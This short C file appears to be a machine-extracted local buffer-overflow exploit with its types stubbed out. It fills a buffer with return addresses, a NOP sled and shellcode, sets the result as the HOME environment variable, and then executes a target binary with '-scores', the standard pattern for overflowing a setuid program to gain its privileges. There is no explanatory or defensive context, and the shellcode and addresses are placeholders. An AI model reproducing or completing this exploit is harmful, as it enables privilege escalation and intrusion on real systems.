
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BIN ;
 int NOP ;
 int RET ;
 int SIZE ;
 int banner () ;
 int execl (int ,int ,char*,int) ;
 int memcpy (char*,int ,int ) ;
 int memret (char*,int,int,int ) ;
 int memset (char*,int ,int) ;
 int setenv (char*,char*,int) ;
 int shellcode ;
 int strlen (int ) ;

int main ()
{
int ret = RET;
char out[SIZE];

memret ((char *)out, ret, SIZE-1, 0);

memset ((char *)out, NOP, 33);
memcpy ((char *)out+33, shellcode, strlen(shellcode));

setenv ("HOME", out, 1);

banner ();
execl (BIN, BIN, "-scores", 0x0);
}
